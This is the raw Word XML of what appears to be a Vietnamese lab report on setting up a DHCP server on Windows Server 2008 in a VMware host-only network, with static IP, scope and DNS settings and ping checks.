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3CB7A" w14:textId="2013A375" w:rsidR="004A3141" w:rsidRPr="00D50E85" w:rsidRDefault="004A3141" w:rsidP="004A3141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk56552926"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00D50E85">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình </w:t>
      </w:r>
      <w:r w:rsidR="007A3D63" w:rsidRPr="00D50E85">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Win server 2008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E884BA5" w14:textId="7EF21F44" w:rsidR="007A3D63" w:rsidRPr="00D50E85" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DHCP Server</w:t>
      </w:r>
      <w:r w:rsidR="004A3141" w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44C97B" w14:textId="7A6FD316" w:rsidR="00FF0494" w:rsidRDefault="004A3141" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidR="007A3D63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="224BD1B8" wp14:editId="7CE9CA96">
            <wp:extent cx="3665220" cy="274891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E61" w14:textId="5E532B07" w:rsidR="00084D4A" w:rsidRDefault="00084D4A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400E7896" w14:textId="1ECC484F" w:rsidR="00084D4A" w:rsidRPr="004A3141" w:rsidRDefault="00084D4A" w:rsidP="004A3141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cấu hình ip tĩnh trước khi cầu hình DHCP server</w:t>
      </w:r>
      <w:r w:rsidR="007A3D63" w:rsidRPr="004A3141">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB8BD5B" w14:textId="77777777" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Control Panel &gt; Network Connections </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E4FC88" w14:textId="64B4E6C5" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chuột phải vào chọn Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F740C" w14:textId="1FB4B1E0" w:rsidR="00084D4A" w:rsidRDefault="004A3141" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="007A3D63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687F3B34" wp14:editId="3CCB82AC">
            <wp:extent cx="3680460" cy="2752481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31" cy="27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0A59" w14:textId="5902AD0B" w:rsidR="00C7794E" w:rsidRDefault="00C7794E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8BA500" w14:textId="4278DB52" w:rsidR="00C7794E" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chọn Internet Protocol Version 4 &gt; Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3182A0F2" w14:textId="75890C16" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720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25A190F8" wp14:editId="67C3E18F">
            <wp:extent cx="3764280" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="762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A6EC" w14:textId="3FADDF01" w:rsidR="00C7794E" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cấu hình theo địa chỉ ip 192.168.12.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C0D6C" w14:textId="2ADFC452" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="657B3D67" wp14:editId="1771DB19">
            <wp:extent cx="3787140" cy="2840355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F81" w14:textId="0C51121E" w:rsidR="00C7794E" w:rsidRDefault="00C7794E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D30B9D4" w14:textId="66E4B72F" w:rsidR="007A3D63" w:rsidRPr="004A3141" w:rsidRDefault="007A3D63" w:rsidP="004A3141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4A3141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cài đặt DHCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030627D8" w14:textId="29BC6A54" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start &gt; Server Manager &gt; Roles &gt; Add Roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C47EA7D" w14:textId="309CB725" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720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63A02A16" wp14:editId="706011ED">
            <wp:extent cx="3764280" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="762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DEA3" w14:textId="1E932676" w:rsidR="007A3D63" w:rsidRDefault="007A3D63" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tại B</w:t>
      </w:r>
      <w:r w:rsidR="00295654">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">efore You Begin &gt; Next </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F10C7F" w14:textId="4F96A48F" w:rsidR="00295654" w:rsidRDefault="00295654" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tại Server Roles &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">chọn DHCP Server </w:t>
      </w:r>
      <w:r w:rsidR="00D50E85" w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và IIS</w:t>
      </w:r>
      <w:r w:rsidR="00D50E85" w:rsidRPr="00D50E85">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; Next</w:t>
      </w:r>
      <w:r w:rsidR="002D6AA7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; ….. &gt; Install</w:t>
      </w:r>
      <w:r w:rsidR="00D50E85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B18D931" w14:textId="0707D359" w:rsidR="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE0685E" wp14:editId="6109C9FC">
            <wp:extent cx="3764861" cy="274320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526" cy="27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9D46" w14:textId="6133DDE2" w:rsidR="002D6AA7" w:rsidRDefault="002D6AA7" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5511D0D1" w14:textId="52C00742" w:rsidR="002D6AA7" w:rsidRDefault="002D6AA7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE34957" w14:textId="701B03F8" w:rsidR="002D6AA7" w:rsidRDefault="002D6AA7" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Start &gt; Administrative tools &gt; DHCP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6E3367" w14:textId="57743C93" w:rsidR="002D6AA7" w:rsidRDefault="002D6AA7" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720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4D5E6DB9" wp14:editId="6EFE0C2D">
            <wp:extent cx="3893820" cy="292036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8D1" w14:textId="4A58E1BB" w:rsidR="002D6AA7" w:rsidRDefault="002D6AA7" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chuột phải vào </w:t>
      </w:r>
      <w:r w:rsidR="00B02DC5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IPv4 &gt; NewScope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED89BDF" w14:textId="6E64DA9D" w:rsidR="00B02DC5" w:rsidRDefault="00B02DC5" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72813908" wp14:editId="5A3BD82D">
            <wp:extent cx="3718560" cy="2622856"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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44" cy="26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9F8A" w14:textId="16BA8005" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Add scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCDF086" w14:textId="5B454508" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720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080EFC91" wp14:editId="74C5972B">
            <wp:extent cx="3878580" cy="2908935"/>
            <wp:effectExtent l="0" t="0" r="762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19DA" w14:textId="2A7915ED" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình IP address range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024AF07B" w14:textId="6BDF0191" w:rsidR="000F4B74" w:rsidRDefault="000F4B74"/>
    <w:p w14:paraId="63F94259" w14:textId="0E08B535" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76661654" wp14:editId="0CDCCF48">
            <wp:extent cx="4033520" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="508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60A2" w14:textId="654C006C" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình Exclusions (loại trừ dãy IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB92D0A" w14:textId="7C01F7C1" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720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61A0A25F" wp14:editId="5831727D">
            <wp:extent cx="4107180" cy="3080385"/>
            <wp:effectExtent l="0" t="0" r="7620" b="571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98DA" w14:textId="78202008" w:rsidR="000F4B74" w:rsidRDefault="000F4B74" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình Lease duration (thời gian sử dụng địa chỉ IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BAF21A" w14:textId="460E9874" w:rsidR="004C07FE" w:rsidRDefault="00D50E85" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidR="004C07FE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7014E27C" wp14:editId="20B71EB7">
            <wp:extent cx="3886200" cy="291465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CB9" w14:textId="13135C70" w:rsidR="000F4B74" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình DHCP options, chọn “Yes, I want to configure these options now”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDF7F9" w14:textId="22A58209" w:rsidR="004C07FE" w:rsidRDefault="00D50E85" w:rsidP="004A3141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                </w:t>
      </w:r>
      <w:r w:rsidR="004C07FE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69519D5B" wp14:editId="3ABA12B1">
            <wp:extent cx="4008120" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="38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9F4A" w14:textId="2832BADB" w:rsidR="004C07FE" w:rsidRPr="004C07FE" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Không cấu hình default gateway</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1F816" w14:textId="3D373BC0" w:rsidR="004C07FE" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C961E74" wp14:editId="44D2965F">
            <wp:extent cx="4069080" cy="3051810"/>
            <wp:effectExtent l="0" t="0" r="762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0693" w14:textId="2ACBC7E9" w:rsidR="004C07FE" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0FEC6" w14:textId="5EA7DB58" w:rsidR="0034432F" w:rsidRPr="0034432F" w:rsidRDefault="0034432F" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Parent domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB28B3" w14:textId="506416CE" w:rsidR="004C07FE" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Chọn địa chỉ của máy chủ window 200</w:t>
      </w:r>
      <w:r w:rsidR="0034432F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="0034432F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Add &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6466C288" w14:textId="00052141" w:rsidR="004C07FE" w:rsidRDefault="0034432F" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="627C05A8" wp14:editId="04CA1AD4">
            <wp:extent cx="3276141" cy="232410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9359" cy="23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5520" w14:textId="236698D0" w:rsidR="004C07FE" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Không cấu hình Wins server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>Chọn “Yes, I want to active this scope now”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320128B9" w14:textId="11431934" w:rsidR="004C07FE" w:rsidRDefault="004C07FE" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chọn Finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562AAC9E" w14:textId="1170022C" w:rsidR="005E3D8A" w:rsidRDefault="005E3D8A" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330F4466" w14:textId="6BBFBF37" w:rsidR="00006A23" w:rsidRDefault="005E3D8A" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kiểm tra ip address của DNS tại ipv4 = với DHCP server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B3093" w14:textId="0D532C9B" w:rsidR="00D50E85" w:rsidRDefault="005E3D8A" w:rsidP="00D50E85">
      <w:pPr>
        <w:ind w:firstLine="72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A8E82" wp14:editId="225E2E58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3489960</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1821180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="647700" cy="137160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1E3CD" id="Rectangle 26" o:spid="_x0000_s1026" style="position:absolute;margin-left:274.8pt;margin-top:143.4pt;width:51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" filled="f" strokecolor="#c00000" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D50E85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C9D5B34" wp14:editId="6BC0CE7A">
            <wp:extent cx="3787140" cy="2840355"/>
            <wp:effectExtent l="0" t="0" r="381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51D8" w14:textId="2F40C386" w:rsidR="00AC44AC" w:rsidRDefault="00AC44AC" w:rsidP="00DC3512">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1A856B" w14:textId="0395DF1F" w:rsidR="00AC44AC" w:rsidRPr="004A3141" w:rsidRDefault="004A3141" w:rsidP="00DC351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Kiểm tra </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107784F" w14:textId="2D46F68D" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00F56AB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56AB3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Edit &gt; virtual network editor &gt; DHCP setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D3A59" w14:textId="28F91D04" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00F56A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HCP Setting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DAFD0A" w14:textId="6543C802" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00F56A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ọn network mình sử dụng, ở đây em chọn host-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745CEA5C" w14:textId="1A4E57C7" w:rsidR="00F56AB3" w:rsidRPr="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00F56A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ỏ tick ở use local DHCP service …………</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2D8BA" w14:textId="4A8A1C46" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00DC3512">
      <w:pPr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6104D2B3" wp14:editId="7175FB5F">
            <wp:extent cx="5631180" cy="3167539"/>
            <wp:effectExtent l="0" t="0" r="762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41" cy="31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7F00" w14:textId="223B4900" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00DC3512">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576C425D" w14:textId="73109A4F" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00DC3512">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ping thử tới máy vừa đc cấp phát 192.168.12.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFCBB6A" w14:textId="56396D83" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3514A581" wp14:editId="45A6600D">
            <wp:extent cx="3855720" cy="2891790"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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1A1F" w14:textId="42E42C07" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="00DC3512">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ping từ máy client - 192.168.12.3     &gt;   server – 192.168.12.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679E454" w14:textId="02174C8E" w:rsidR="00F56AB3" w:rsidRDefault="00F56AB3" w:rsidP="004A3141">
      <w:pPr>
        <w:ind w:firstLine="720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035E7FD" wp14:editId="6BDC6B8F">
            <wp:extent cx="3810000" cy="285750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6B86" w14:textId="77777777" w:rsidR="00D50E85" w:rsidRDefault="00F56AB3" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình xong DHCP, </w:t>
      </w:r>
      <w:r w:rsidR="00395FC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cấp phát ip thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2C587" w14:textId="45F89A5B" w:rsidR="00D50E85" w:rsidRPr="00D50E85" w:rsidRDefault="00D50E85" w:rsidP="00D50E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D50E85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
